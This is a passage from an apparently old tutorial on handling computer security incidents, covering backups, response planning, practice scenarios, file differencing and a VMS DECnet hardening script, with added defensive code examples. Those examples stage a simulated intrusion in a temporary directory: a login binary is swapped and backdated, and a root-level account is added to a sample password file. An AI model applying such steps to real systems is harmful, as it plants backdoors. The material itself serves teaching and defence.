security incident or otherwise, it is gone.

Of course, if the computer is controlling a physical device,
there may be more than just data at stake. For example, the most
important goal for the computer in a pacemaker is to get the next
pulse out on time.

In terms of the protection of user data, there is nothing that
can take the place of a good backup strategy. During the week
that this chapter was written, three centers that I work with
suffered catastrophic data loss: two of the three from air
conditioning problems, one from programmer error. At all three
centers, there were machines with irreplaceable scientific data
that had never been backed up in their lives.

Many backup failures are caused by more subtle problems than
these. Still, it is instructive to note that many sites never
make a second copy of their data. This means that any problem,
from a defective disk drive, to a water main break, to a typing
mistake when updating system software, can spell disaster.

If the primary goal is that of maintaining and restoring data,
the first thing to do during an incident is to check when the
most recent backup was completed. If it was not done very
recently, an immediate full system dump must be made, and the
system must be shut down until it is done. Of course, one can’t
trust this dump as a clean copy of the system, as the attacker
may have already modified it; its value is in preserving the user
data and the evidence, not in serving as a source for restoring
system files.

3.1.2 Maintaining and restoring service

Second to maintaining the data, maintaining service is important.
Users have probably come to rely on the computing center and will
not be pleased if they can’t continue to use it as planned.

3.1.3 Figuring how it happenned

This is by far the most interesting part of the problem and in
practice seems to take precedence over all of the others. It of
course strongly conflicts with the two preceding goals.

By immediately making a complete copy of the system after the
attack, one can analyze it at one’s leisure. This means that we
don’t need to worry about normal use destroying evidence, or
about the attacker re-entering to destroy evidence of what
happened.

Ultimately, one may never be able to determine how it happened.
One may find several ways that it “could have happened,”
presenting a number of things to fix.

3.1.4 Avoiding the Future Incidents and Escalation

This needs to be an explicit goal and often is not realized until
much too late. To avoid future incidents one of course should
fix the problem that first occurred and remove any new security
vulnerabilities that were added either by the attackers or by the
system staff while trying to figure out what was going on.

Beyond this, one needs to avoid turning a casual attacker who
may not be caught into a dedicated opponent, to avoid enticing
other attackers, and to prevent others in one’s organization and
related organizations from being forced to introduce restrictions
that would be neither popular nor helpful.

3.1.5 Avoiding looking foolish

Another real-world consideration that I had not expected to
become an issue is that of image management. In practice, it is
important not to look foolish in the press, an issue that we will
discuss more fully in an appendix. It is also important for the
appropriate people within the organization to be briefed on the
situation. It is embarrassing to find out about an incident in
one’s own organization from a reporter’s phone call.

3.1.6 Finding out who did it

This goal is often over-emphasized. There is definitely value
in knowing who the attacker was so that one can debrief him and
discourage him from doing such things in the future.

In the average case, it takes more effort to determine the
attacker’s identity than it is worth, unless one plans to
prosecute him.

3.1.7 Punishing the attackers

The merits of this goal have been seriously debated in the past
few years. As a practical matter, it is very difficult to get
enough evidence to prosecute someone, and there have been very
few successful prosecutions. If this is one of the goals, very
careful record keeping needs to be done at all times during the
investigation, and solving the problem will be slowed down as one
waits for phone traces and various court orders.

3.2 Backups

It should be clear that accomplishing most of the goals requires
having extra copies of the data that is stored on the system.
These extra copies are called “backups” and are generally stored
on magnetic tape.

Let us consider two aspects of keeping backup copies of your
data. First, we will look at why this is important and what the
backups are used for, and then we will examine the characteristics
of a good backup strategy.

3.2.1 Why We Need Back Ups

Good backups are needed for four types of reasons. The first
three of these are not security related per se, though an
insufficient backup strategy will lead to problems with these
first three as well.

If a site does not have a reliable backup system, when an
incident occurs one must seriously consider immediate shutdown
of the system so as not to endanger the user data.

User Errors. Every once in a while, a user deletes a file or
overwrites data and then realizes that he needs it back. In
some operating systems, “undelete” facilities or version
numbering are enough to protect him, if he notices his
mistake quickly enough. Sometimes he doesn’t notice the
error for a long time, or deletes all of the versions, or
expunges them, and then wants the data back.
If there is no backup system at all, the user’s data is just
plain lost. If there is a perfect backup system, he is
quickly able to recover from his mistake. If there is a poor
backup system, his data may be recovered in a corrupted
form or with incorrect permissions set on it.

There have been cases where backup systems returned data
files as publicly writable, and obvious problems have
ensued from it. Perhaps as seriously, there are sites that
have stored all of the backup data in a publicly readable
form, including the data that was protected by the
individual user.
System Staff Errors. Just as users make mistakes, staff members
do as well. In doing so, they may damage user files, system
files or both. Unless there is a copy of the current system
files, the staff must restore the system files from the
original distribution and then rebuild all of the site
specific changes. This is an error-prone process, and often
the site-specific changes include removing unwanted
debugging features that pose security vulnerabilities.

Hardware/Software Failures. Hardware occasionally fails. If the
only copy of the data is on a disk that has become
unreadable, it is lost. Software occasionally fails. Given
a serious enough error, it can make a disk unreadable.

Security Incidents. In this document, our main concern is with
security incidents. In determining what happened and
correcting it, backups are essential.
Basically, one would like to return every file to the state
before the incident except for those that are being modified
to prevent future incidents. Of course, to do this, one
needs a copy to restore from. Naively, one would think that
using the modification date would allow us to tell which
files need to be restored. This is of course not the case.
The clever attacker will modify the system clock and/or the
timestamps on files to prevent this, so the comparison has
to be made against the content of the trusted copy, not
against dates.
In many attacks, at least one of the following types of files
is modified.

- The system binary that controls logging in.
- The system authorization file that lists the users and their
privileges.
- The system binary that controls one or more daemons.
- The accounting and auditing files.
- Users’ startup files and permission files.
- The system directory walking binary.
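An added example, not code from the paper, of why the modification date cannot be trusted and what to compare instead: a script that records a manifest of POSIX cksum values from the trusted copy of a tree and later compares the live tree against it, next to the naive “files newer than the last backup” test. The constructed incident below replaces the login binary and puts its timestamp back, which the date test misses and the checksum test catches. The directory layout, dates and file contents are assumptions for the example.

```sh
#!/bin/sh
# Added example, not from the paper.  A manifest of checksums taken from the
# trusted copy is compared with the live tree; a change whose timestamp the
# attacker reset is invisible to the modification-date test but not to the
# checksum test.  The manifest itself must live with the backup (or on
# read-only media), or the attacker rewrites it too.

# "<crc> <size> <path>" for every regular file under $1, paths relative.
make_manifest() {
    ( cd "$1" && find . -type f -print | sort | while read -r f; do cksum "$f"; done )
}

# Compare live tree $1 with manifest $2: prints "added", "changed" and
# "missing" lines, sorted.
verify_manifest() {
    live=$(mktemp)
    make_manifest "$1" > "$live"
    awk 'NR == FNR { want[$3] = $1 " " $2; next }
         { have[$3] = $1 " " $2 }
         END {
             for (p in want) if (!(p in have)) print "missing " p
             for (p in have) if (!(p in want)) print "added " p
             for (p in want) if ((p in have) && have[p] != want[p]) print "changed " p
         }' "$2" "$live" | sort
    rm -f "$live"
}

# The naive test: files under $1 modified more recently than marker file
# $2 (give the marker as an absolute path).
newer_than() {
    ( cd "$1" && find . -type f -newer "$2" -print | sort )
}

# Constructed incident (not a real system).  The system was installed in
# 2019 and backed up, manifest included, at the start of 2020.  The
# attacker then replaces the login binary and puts its timestamp back,
# edits the authorization file without bothering to, and adds a hidden
# file.  Creates $1/sys, $1/manifest and $1/stamp.
make_sample_incident() {
    mkdir -p "$1/sys/bin" "$1/sys/etc"
    printf 'login v1\n' > "$1/sys/bin/login"
    printf 'ls v1\n'    > "$1/sys/bin/ls"
    printf 'root:x:0:0::/:/bin/sh\n' > "$1/sys/etc/passwd"
    touch -t 201901010000 "$1/sys/bin/login" "$1/sys/bin/ls" "$1/sys/etc/passwd"
    make_manifest "$1/sys" > "$1/manifest"            # taken while the system was trusted
    touch -t 202001010000 "$1/stamp"                  # time of the last good backup
    printf 'login v1 plus trapdoor\n' > "$1/sys/bin/login"
    touch -t 201901010000 "$1/sys/bin/login"          # timestamp put back by the attacker
    printf 'root:x:0:0::/:/bin/sh\nhax:x:0:0::/:/bin/sh\n' > "$1/sys/etc/passwd"
    printf 'shell\n' > "$1/sys/bin/.hidden"
}

d=$(mktemp -d)
make_sample_incident "$d"
echo "by date:";     newer_than "$d/sys" "$d/stamp"          # misses bin/login
echo "by checksum:"; verify_manifest "$d/sys" "$d/manifest"  # finds all three
rm -rf "$d"
```

cksum is a CRC, fine against an attacker who does not know a manifest exists and good enough to decide what to restore; it is not a defense against one who does, which is why the manifest belongs on the tape and not in /etc.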

Now that we understand why we need back ups in order to recover

3.2.2 How to form a Back Up Strategy that Works

There are a few basic rules that provide for a good backup
strategy.

- Every file that one cares about must be included.

- The copies must be in non-volatile form. While having two
  copies of each file, one on each of two separate disk drives,
  is good for protection from simple hardware failures, it is
  no defense from an intelligent attacker who will modify
  both copies, or from a clever system staffer who saves time
  by modifying them both at once.

- Long cycles. It may take weeks or months to notice a
  mistake. A system that reuses the same tape every week will
  have destroyed the data before the error is noticed.

- Separate tapes. Overwriting the existing backup before
  having the new one completed is an accident waiting to
  happen.

- Verified backups. It is necessary to make sure that one can
  read the tapes back in. One site with a programming bug in
  its back up utility had a store room filled with unreadable
  tapes!
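The "separate tapes" and "verified backups" rules above, as an added example that is not part of the original primer: a Python backup routine that always writes to a new archive name, records a hash manifest, and verifies the archive by reading it back. The sample tree, the USTAR archive layout and the simulated media fault are constructed for the demonstration.

```python
import hashlib
import shutil
import tarfile
import tempfile
import time
from pathlib import Path


def sha256_stream(fh):
    """Hash an open binary stream in 64 KiB chunks."""
    h = hashlib.sha256()
    for chunk in iter(lambda: fh.read(65536), b""):
        h.update(chunk)
    return h.hexdigest()


def _anonymize(info):
    """Owner fields are not needed to verify content; zeroing them keeps
    every header inside the fixed USTAR field widths."""
    info.uid = info.gid = 0
    info.uname = info.gname = ""
    return info


def make_backup(src_root, backup_dir):
    """Archive every regular file under src_root into a NEW, uniquely named
    tar file and return (archive path, manifest of relative path -> sha256).
    The name carries a UTC timestamp and the file is opened exclusively, so
    an existing backup is never overwritten while the new one is still being
    written (the 'separate tapes' rule)."""
    src_root, backup_dir = Path(src_root), Path(backup_dir)
    backup_dir.mkdir(parents=True, exist_ok=True)
    stamp = time.strftime("%Y%m%dT%H%M%SZ", time.gmtime())
    archive = backup_dir / f"backup-{stamp}.tar"
    manifest = {}
    with open(archive, "xb") as raw:  # "x": fail rather than clobber
        with tarfile.open(fileobj=raw, mode="w", format=tarfile.USTAR_FORMAT) as tar:
            files = sorted(p for p in src_root.rglob("*")
                           if p.is_file() and not p.is_symlink())
            for path in files:
                rel = str(path.relative_to(src_root))
                with open(path, "rb") as fh:
                    manifest[rel] = sha256_stream(fh)
                tar.add(str(path), arcname=rel, filter=_anonymize)
    return archive, manifest


def verify_backup(archive, manifest):
    """Read the archive back and compare every member with the manifest (the
    'verified backups' rule).  Returns a list of (problem, name) tuples; an
    empty list means the archive restores exactly what was recorded.  An
    archive that cannot be parsed is reported rather than raised so that a
    nightly job can log it."""
    problems, seen = [], set()
    try:
        with tarfile.open(str(archive), mode="r:") as tar:
            for member in tar:
                if not member.isfile():
                    continue
                seen.add(member.name)
                if member.name not in manifest:
                    problems.append(("extra", member.name))
                    continue
                with tar.extractfile(member) as fh:
                    if sha256_stream(fh) != manifest[member.name]:
                        problems.append(("mismatch", member.name))
    except tarfile.TarError as exc:
        problems.append(("unreadable", str(exc)))
    problems.extend(("missing", rel) for rel in sorted(set(manifest) - seen))
    return problems


def demo():
    """Constructed sample: back up a small tree, verify it, then flip one byte
    of file data inside the archive (a bad tape) and verify again."""
    work = Path(tempfile.mkdtemp(prefix="backupdemo_"))
    src = work / "src"
    for rel, data in (("docs/notes.txt", b"meeting notes, keep these\n"),
                      ("home/alice/report.txt", b"quarterly report draft\n"),
                      ("home/bob/data.bin", bytes(range(64)))):
        (src / rel).parent.mkdir(parents=True, exist_ok=True)
        (src / rel).write_bytes(data)
    archive, manifest = make_backup(src, work / "tapes")
    clean = verify_backup(archive, manifest)
    # USTAR layout: a 512-byte header, then the first member's data.  Flip a
    # byte of that data to simulate media corruption; tar itself carries no
    # per-file checksum, so only the manifest comparison can catch it.
    with open(archive, "r+b") as fh:
        fh.seek(512 + 3)
        byte = fh.read(1)[0]
        fh.seek(512 + 3)
        fh.write(bytes([byte ^ 0xFF]))
    corrupted = verify_backup(archive, manifest)
    shutil.rmtree(work)
    return clean, corrupted


if __name__ == "__main__":
    print(demo())
```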

3.3 Forming a Plan

While the first major section (avoidance) contained a lot of
standard solutions to standard problems, planning requires a
great deal more thought and consideration. A great deal of this
is list making.

Call Lists. If a system staffer suspects a security incident
is happening right now, whom should he call? And if he gets
no answer on that line? What if the people on the call list
are no longer employees or have long since died? What if it
is Christmas Day or Sunday morning?

Time–Distance. How long will it take for the people who are
called to arrive? What should be done until they get there?

Things a User Notices. If a user notices something odd, whom
should he tell? How does he know this?

Threats and Tips. What should your staffers do if they receive a
threat or a tip-off about a breakin?

Press. What should a system staffer do when he receives a call
from the press asking about an incident that he, himself,
doesn’t know about? What about when there is a real incident
underway?

Shutting Down. Under what circumstances should the center be
shut down or removed from the net? Who can make this decision?
When should service be restored?

Prosecution. Under what circumstances do you plan to prosecute?

Timestamps. How can you tell that the timestamps have been
altered? What should you do about it? Would running NTP (the
Network Time Protocol) help?

Informing the Users. What do you tell the users about all this?

List Logistics. How often do you update the incident plan? How
does your system staff learn about it?

3.4 Tools to have on hand

File Differencing Tools

Netwatcher

Spying tools

Backup Tapes

Blank Tapes

Notebooks

3.5 Sample Scenarios to Work on in Groups

In order to understand what goal priorities you have for your
center and as a general exercise in planning, let us consider a
number of sample problems. Each of these is a simplified version
of a real incident. What would be appropriate to do if a similar
thing happened at your center? Each new paragraph indicates new
information that is received later.

- A system programmer notices that at midnight each night,
  someone makes 25 attempts to guess a username–password
  combination.

  Two weeks later, he reports that each night it is the same
  username–password combination.

- A system programmer gets a call reporting that a major
  underground cracker newsletter is being distributed from the
  administrative machine at his center to five thousand sites
  in the US and Western Europe.

  Eight weeks later, the authorities call to inform you that the
  information in one of these newsletters was used to disable
  “911” in a major city for five hours.

- A user calls in to report that he can’t log in to his account
  at 3 in the morning on a Saturday. The system staffer can’t
  log in either. After rebooting to single user mode, he finds
  that the password file is empty.

  By Monday morning, your staff determines that a number of
  privileged file transfers took place between this machine and
  a local university.

  Tuesday morning a copy of the deleted password file is found
  on the university machine along with password files for a
  dozen other machines.

  A week later you find that your system initialization files
  had been altered in a hostile fashion.

- You receive a call saying that a breakin to a government lab
  occurred from one of your center’s machines. You are
  requested to provide accounting files to help track down the
  attacker.

  A week later you are given a list of machines at your site
  that have been broken into.

- A user reports that the last login time/place on his account
  aren’t his.

  Two weeks later you find that your username space isn’t
  unique and that unauthenticated logins are allowed between
  machines based entirely on username.

- A guest account is suddenly using four CPU hours per day
  when before it had just been used for mail reading.

  You find that the extra CPU time has been going into
  password cracking.

  You find that the password file isn’t one from your center.
  You determine which center it is from.

- You hear reports of a computer virus that paints trains on
  CRT’s.

  You login to a machine at your center and find such a train
  on your screen.

  You look in the log and find no notation of such a feature
  being added.

  You notice that five attempts were made to install it within
  an hour of each other before the current one.

  Three days later you learn that it was put up by a system
  administrator locally who had heard nothing about the virus
  scare or about your asking about it.

- You notice that your machine has been broken into.

  You find that nothing is damaged.

  A high school student calls up and apologizes for doing it.

- An entire disk partition of data is deleted. Mail is
  bouncing because the mail utilities were on that partition.

  When you restore the partition, you find that a number of
  system binaries have been changed. You also notice that the
  system date is wrong, off by 1900 years.

- A reporter calls up asking about the breakin at your center.
  You haven’t heard of any such breakin.

  Three days later you learn that there was a breakin. The
  center director had his wife’s name as a password.

- A change in system binaries is detected.

  The day that it is corrected they again are changed.

  This repeats itself for some weeks.

4 Incident Handling

The difficulty of handling an incident is determined by several
factors. These include the level of preparation, the sensitivity
of the data, and the relative expertise levels of the attacker(s)
and the defender(s). Hopefully, preliminary work in terms of
gathering tools, having notification lists, policies and, most
importantly, backup tapes will make the actual handling much
easier.

This section is divided into three parts. The first of these
deals with general principles. The second presents some
particular (simple) techniques that have proven useful in the
past. Finally, the third section presents a description of a
simulation exercise based on a set of real attacks.

4.1 Basic Hints

There are a number of basic issues to understand when handling a
computer incident. Most of these issues and techniques are
relevant in a wide variety of unusual and emergency situations.

4.1.1 Panic Level

It is critical to determine how much panic is appropriate. In
many cases, a problem is not noticed until well after it has
occurred and another hour or day will not make a difference.

4.1.2 Call Logs and Time Lines

All (or almost all) bad situations eventually come to an end. At
that point, and perhaps at earlier points, a list of actions and
especially communications is needed to figure out what happened.

4.1.3 Accountability and Authority

During an incident it is important to remind people what
decisions they are empowered to make and what types of decisions
they are not. Even when this is explicitly discussed and
formulated in a contingency plan, people have a tendency to
exceed their authority when they are convinced that they know
what should be done.

4.1.4 Audit Logs

Audit logs need to be copied to a safe place as quickly as
possible. It is often the case that an attacker returns to a
computer to destroy evidence that he had previously forgotten
about.

4.1.5 Timestamps

The second most powerful tool (second only to backup tapes) in an
incident handler’s arsenal is timestamps. When in doubt as to
what to do, try to understand the sequencing of the events. This
is especially true when some of the actions will change the value
of the system clock.

4.2 Basic Techniques

There are five basic sets of techniques for understanding what
has happened.

4.2.1 Differencing

Differencing is the act of comparing the state of a part of the
computer system to the state that it was in previously. In some
cases we have compared every executable system file with the
corresponding file on the original distribution tape to find what
files the attacker may have modified. Checksums are often used
to decrease the cost of differencing. Sometimes people look only
for differences in the protection modes of the files.

4.2.2 Finding

Finding is generally cheaper than differencing. Finding is the
act of looking at a part of a computer system for files that have
been modified during a particular time or have some other
interesting property.
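The differencing and finding techniques of the two sections above, as an added example that is not part of the original primer: a Python script that baselines a tree by content hash and protection mode, reports what changed, and lists files whose inode change time (ctime) falls inside an incident window, flagging those whose modification time claims otherwise. It assumes POSIX timestamp semantics (utime() sets mtime but the kernel sets ctime), and the tree layout and file contents are constructed here.

```python
import hashlib
import os
import shutil
import stat
import tempfile
import time
from pathlib import Path


def file_sha256(path):
    """Hash a file in 64 KiB chunks so large system binaries need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def regular_files(root):
    """Yield (path, path relative to root, lstat) for every regular file under
    root.  Symlinks, devices and directories are skipped."""
    root = Path(root)
    for path in sorted(root.rglob("*")):
        st = path.lstat()
        if stat.S_ISREG(st.st_mode):
            yield path, str(path.relative_to(root)), st


def build_manifest(root):
    """Record hash, protection mode and size of every regular file under root.
    Keys are relative paths, so a manifest taken from a distribution copy can
    be compared with one taken from the live system."""
    return {rel: {"sha256": file_sha256(path),
                  "mode": stat.S_IMODE(st.st_mode),
                  "size": st.st_size}
            for path, rel, st in regular_files(root)}


def diff_manifests(baseline, current):
    """Differencing: what changed between a trusted baseline and the present.
    Content is judged by hash, never by mtime, because anyone who can write a
    file can also set its mtime."""
    report = {"added": [], "removed": [], "content": [], "mode": []}
    for rel in sorted(set(baseline) | set(current)):
        if rel not in baseline:
            report["added"].append(rel)
        elif rel not in current:
            report["removed"].append(rel)
        else:
            old, new = baseline[rel], current[rel]
            if old["sha256"] != new["sha256"]:
                report["content"].append(rel)
            if old["mode"] != new["mode"]:
                report["mode"].append((rel, oct(old["mode"]), oct(new["mode"])))
    return report


def find_changed_since(root, since):
    """Finding: files whose inode change time (ctime) is at or after `since`.
    utime() can rewrite mtime but not ctime, so a file whose mtime was pushed
    into the past still carries a fresh ctime.  mtime_predates_window means
    either a metadata-only change (chmod, chown) or a backdated mtime; the
    hash comparison from diff_manifests tells the two apart.  An attacker who
    resets the system clock defeats ctime as well, so treat hits as leads."""
    return {rel: {"mtime_predates_window": st.st_mtime < since}
            for _path, rel, st in regular_files(root) if st.st_ctime >= since}


def simulate_incident():
    """Constructed sample: a small tree is baselined, then altered the way the
    text describes (login binary replaced and backdated, a permission file
    loosened, one binary removed, an unexpected one added)."""
    root = Path(tempfile.mkdtemp(prefix="diffdemo_"))
    (root / "bin").mkdir()
    (root / "etc").mkdir()
    (root / "bin" / "login").write_bytes(b"original login binary")
    (root / "bin" / "ls").write_bytes(b"original ls binary")
    (root / "etc" / "passwd").write_bytes(b"root:x:0:0:root:/:/bin/sh\n")
    os.chmod(root / "etc" / "passwd", 0o644)
    baseline = build_manifest(root)

    time.sleep(1.1)                  # step past 1-second timestamp granularity
    since = time.time() - 1.0        # start of the incident window
    login = root / "bin" / "login"
    login.write_bytes(b"replaced login binary")
    a_day_ago = since - 86400
    os.utime(login, (a_day_ago, a_day_ago))   # mtime goes back; ctime moves forward
    os.chmod(root / "etc" / "passwd", 0o666)
    (root / "bin" / "ls").unlink()
    (root / "bin" / "newtool").write_bytes(b"unexpected new binary")

    result = {"diff": diff_manifests(baseline, build_manifest(root)),
              "found": find_changed_since(root, since)}
    shutil.rmtree(root)
    return result


if __name__ == "__main__":
    import pprint
    pprint.pprint(simulate_incident())
```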

4.2.3 Snooping

Snooping is the act of placing monitors on a system to report the
future actions of an attacker. Often a scripting version of the
command line interpreter is used or a line printer or PC is
spliced in to the incoming serial line.

4.2.4 Tracking

Tracking is the use of system logs and other audit trails to try
to determine what an attacker has done. It is particularly
useful in determining what other machines might be involved in an
incident.

4.2.5 Psychology

A wide range of non-technical approaches have been employed over
the years with an even wider range of results. Among these
approaches have been leaving messages for the attacker to find,
starting talk links, calling local high school teachers, etc.

4.3 Prosecution

Prosecution has historically been very difficult. Less than a
year ago, the FBI advised me that it was essentially impossible
to succeed in a prosecution. More recently, FBI agent Dave
Icove (icove@dockmaster.cnsc.mil, 703–640–1176) has assured me
that the FBI will be taking a more active role in the prosecution
of computer break-ins and has expressed interest in lending
assistance to investigations where prosecution is appropriate.

4.4 Exercise

The bulk of this class hour is reserved for an incident handling
simulation. A facility will be described. A consensus policy
for incident handling will be agreed upon and then the simulation
will begin.

During the simulation, the effects of the attackers’ actions and
those of third parties will be described. The participants can
choose actions and take measurements and will be informed of the
results of those actions and measurements. In a sufficiently
small working group that had several days, we would run a
software simulation; but as many of the actions take hours (e.g. a
full system comparison to the original distribution), we will
proceed verbally in the short version of this workshop.

5 Recovering From Disasters

Incident recovery is the final portion of the incident
handling process. Like the other portions of incident handling,
it is not particularly difficult but is sufficiently intricate to
allow for many errors.

Telling everyone that it is over. For a large incident, it is not
unusual to have contacted people at a dozen or more sites.
It is important to let everyone know that you are done and
to be sure to give your colleagues the information that they
need. It is also important that your staff knows that
things are over so that they can return to normal work.
Generally a lot of people need to be thanked for the extra
hours and effort that they have contributed.

Removing all Tools. Many of the tools that were installed and
used during an incident need to be removed from the system.
Some will interfere with performance. Others are worth
stealing by a clever attacker. Similarly a future attacker
that gets a chance to look at the tools will know a lot
about how you are going to track him. Often extra accounts
are added for handling the incident. These need to be
removed.

File and Service Restoration. Returning the file system to a
“known good state” is often the most difficult part of
recovery. This is especially true with long incidents.

Reporting Requirements. Often, especially if law enforcement
agencies have become involved, a formal report will be
required.
History. After everything is over, a final reconstruction of the
events is appropriate. In this way, everyone on your staff
is telling the same story.

Future Prevention. It is important to make sure that all of the
vulnerabilities that were used in or created by the incident
are secured.

Just after an incident, it is likely to be a good time to create
sensible policies where they have not existed in the past and to
request extra equipment or staffing to increase security.
Similarly, it is a logical time for someone else to demand
stricter (nonsensical) policies to promote security.

A Micro Computers

While the bulk of this book and class has concerned multi-user
computers on networks, micro computers are also worth some
attention.

Basically there are four issues that cause concern.

Shared Disks. In many settings, micro computers are shared among
many users. Even if each user brings his own data, often
the system programs are shared on a communal hard disk,
network or library of floppies. This means that a single
error can damage the work of many people. Such errors might
include destruction of a system program, intentional or
accidental modification of a system program or entry of a
virus.
To combat this, systematic checking or reinstallation of
software from a known protected source is recommended. In
most shared facilities, refreshing the network, hard disk or
floppy library weekly should be considered. Shared floppies
should be write protected and the original copies of
programs should be kept under lock and key and used only to
make new copies.
Trusted servers that provide read only access to the system
files have been successfully used in some universities. It
is absolutely critical that these machines be used only as
servers.

Viruses. A number of computer viruses have been found for
micro-computers. Many experts consider this problem to be
practically solved for Macintoshes and soon to be solved for
IBM-style PC’s.
Two basic types of anti-viral software are generally
available. The first type is installed into the operating
system and watches for viruses trying to infect a machine.
Examples of this on the Mac include Symantec’s SAM (Part 1),
Don Brown’s Vaccine and Chris Johnson’s GateKeeper.
The second type of anti-viral software scans the disk to
detect and correct infected programs. On the Mac, SAM (Part
2), HJC Software’s Virex, and John Norstad’s Disinfectant
are commonly used disk scanners.

On the PC type of machines we find three types of virus.
The first of these is a boot sector virus that alters the
machine language start up code found on the diskette. The
second infects the command.com startup file and the third
alters the exe (machine language executable) files.
Flu Shot Plus by Ross Greenberg is an example of a program
to deal with command.com and some exe viruses. Novirus,
cooperatively built by Yale, Alemeda and Merit, is one of the
boot track repair systems.
There are a number of electronic discussion groups that deal
with computer viruses. On BITNET (and forwarded to other
networks), virus-l supports discussion about PC and Mac
viruses, while valert is used to announce the discovery of new
ones. Compuserve’s macpro serves as a forum to discuss
Macintosh viruses.

Network. The third issue is the placement of single user
computers on networks. Since there is little or no
authentication on (or of) these machines, care must be taken
not to place sensitive files upon them in such a
configuration.

Reliability. Finally there is a reliability issue. Most single
user computers were never designed for life and time
critical applications. Before using such a computer in such
an application, expert advice should be sought.

In the use of single user computers, there are some basic issues
that need to be considered and some simple advice that should be
given.

In the advice column, there are a few basic points.

1. Where practical, each user should have his own system disks
and hence be partially insulated from potential mistakes.

2. When people are sharing disks, have an explicit check out
policy logging the users of each disk. Be sure to
write-protect them and teach the users how to write protect
their own system disks. (Most PC programs are sold on
write-protected disks; this is not true of most Macintosh
programs.)

3. Keep a back up copy of all system programs to allow for easy
restoration of the system.

4. Write lock originals and keep them under lock and key for
emergency use only.

5. Have an explicit policy and teach users about software theft
and software ethics.

6. Teach users to back up their data. Just as with large
computers, the only real defense from disaster is
redundancy.

Even when the computer center is not providing the machines
themselves, it should generally help to teach users about
backups, write protection, software ethics and related issues.
Most PC users do not realize that they are their own system
managers and must take the responsibility of care for their
systems or risk the consequences.

B VMS Script

This script is courtesy of Kevin Oberman of Lawrence Livermore
National Labs. It is used on DEC VMS systems to close a number
of the standard created by the normal installation of DECNET.
Rather than typing this in by hand, please request one by
electronic mail. This DCL script is provided for reference
purposes only and is not guaranteed or warranted in any way.

$ Type SYS$INPUT

    This procedure changes the password for the default DECnet account and
    sets up a new account for FAL activity. It prevents unauthorized users
    from making use of the default DECnet account for any purpose except
    file transfer.

    This procedure assumes a default DECnet account named DECNET using a
    directory on SYS$SYSROOT. If this is not the case on this system, do
    not proceed! It will use UIC [375,375]. If this UIC is already in
    use, do not continue.

$ Read/End=Cleanup/Prompt="Continue [N]: " SYS$COMMAND OK
$ If .NOT. OK Then Exit
$ Say := "Write SYS$OUTPUT"
$ Current_Default = F$Environment("DEFAULT")
$! Process id gives the scratch command file below a unique name
$ PID = F$GetJPI("", "PID")
$! Defaults for the two answers that are skipped on some paths
$ Cluster = 0
$ Quota = 0
$ Has_Privs = F$Priv("CMKRNL,OPER,SYSPRV")
$ If Has_Privs Then GoTo Privs_OK
$ Say "This procedure requires CMKRNL, OPER, and SYSPRV."
$ Exit
$Privs_OK:
$ On Control_Y Then GoTo Cleanup
$ On Error Then GoTo Cleanup
$ Set Terminal/NoEcho
$ Read/End=Cleanup/Prompt="Please enter new default DECnet password: " -
        SYS$COMMAND DN_Password
$ Say " "
$ If F$Length(DN_Password) .GT. 7 Then GoTo DN_Password_OK
$ Say "Minimum password length is 8 characters"
$ GoTo Privs_OK
$DN_Password_OK:
$ Read/End=Cleanup/Prompt="Enter new FAL password: " SYS$COMMAND FAL_Password
$ Say " "
$ If F$Length(FAL_Password) .GT. 7 Then GoTo FAL_Password_OK
$ Say "Minimum password length is 8 characters"
$ GoTo DN_Password_OK
$FAL_Password_OK:
$ Set Terminal/Echo
$ Type SYS$INPUT

    The FAL account requires a disk quota. This quota should be large
    enough to accommodate the files typically loaded into this account.
    Should the default quota be exhausted, the system will fail to perform
    DECnet file transfers.

    It is also advisable to clear old files from the directory on a daily
    basis.

$ If .NOT. F$GetSYI("CLUSTER_MEMBER") Then GoTo Not_Cluster
$ Say "This system is a cluster member."
$ Read/Prompt="Has this procedure already been run on another cluster member: " -
        SYS$COMMAND Cluster
$ If Cluster Then GoTo No_Create
$Not_Cluster:
$ Read/End=Cleanup -
        /Prompt="Disk quota for FAL account (0 if quotas not enabled): " -
        SYS$COMMAND Quota
$ If F$Type(Quota) .EQS. "INTEGER" Then GoTo Set_Quota
$ Say "Disk quota must be an integer"
$ GoTo FAL_Password_OK
$Set_Quota:
$ Say "Setting up new FAL account."
$ Set NoOn
$ Set Default SYS$SYSTEM
$ UAF := "$Authorize"
$ UAF Copy DECNET FAL/Password='FAL_Password'/UIC=[375,375]/Directory=[FAL]
$ Create/Directory SYS$SYSROOT:[FAL]/Owner=[FAL]
$No_Create:
$ NCP := "$NCP"
$ NCP Define Object FAL USER FAL Password 'FAL_Password'
$ NCP Set Object FAL USER FAL Password 'FAL_Password'
$ If (Quota .EQ. 0) .OR. Cluster Then GoTo No_Quota
$ Say "Entering disk quota for FAL account."
$ Set Default SYS$SYSTEM
$! DISKQUOTA takes its commands from a small generated command file
$ Open/Write Quota SET_QUOTA'PID'.COM
$ Write Quota "$ Run SYS$SYSTEM:DISKQUOTA"
$ Write Quota "Add FAL/Perm=''Quota'"
$ Close Quota
$ @SET_QUOTA'PID'
$ Delete SET_QUOTA'PID'.COM;
$No_Quota:
$ Say "Resetting default DECNET account password"
$ NCP Define Executor Nonpriv Password 'DN_Password'
$ NCP Set Executor Nonpriv Password 'DN_Password'
$ UAF Modify DECNET/Password='DN_Password'
$Cleanup:
$ Set Default 'Current_Default'
$ Set Terminal/Echo
$ Exit

C Highly Sensitive Environments

A computing environment should be considered highly sensitive
when it is potentially profitable to convert the data or when
great inconvenience and losses could result from errors produced
there. In particular, you should consider your site sensitive if
any of the following conditions apply:

1. You process data that the government considers sensitive.
2. You process financial transactions such that a single
transaction can exceed $25,000.00 or the total transactions
exceed 2.5 Million dollars.

3. You process data whose time of release is tightly controlled
and whose early release could give significant financial
advantage.

4. Your function is life critical.
5. Your organization has enemies that have a history of
“terrorism” or violent protests.

6. Your data contains trade secret information that would be
of direct value to a competitor.

Essentially money is more directly valuable than secrets, and a
“villain” can potentially steal more from one successful attack
on one financial institution than he will ever be able to get
selling state secrets for decades. There is significant concern
that the electrical utility companies and banks conducting
electronic funds transfers will be targets of terrorists in the
next decade.

For centers that must support sensitive processing it is strongly
advised to completely separate the facilities for processing this
data from those facilities used to process ordinary data and to
allow absolutely no connection from the sensitive processing
systems to the outside world. There is no substitute for
physical security, and proper separation will require an attacker
to compromise physical security in order to penetrate the system.
Techniques for coping with the remaining “insider threat” are
beyond the scope of this tutorial.

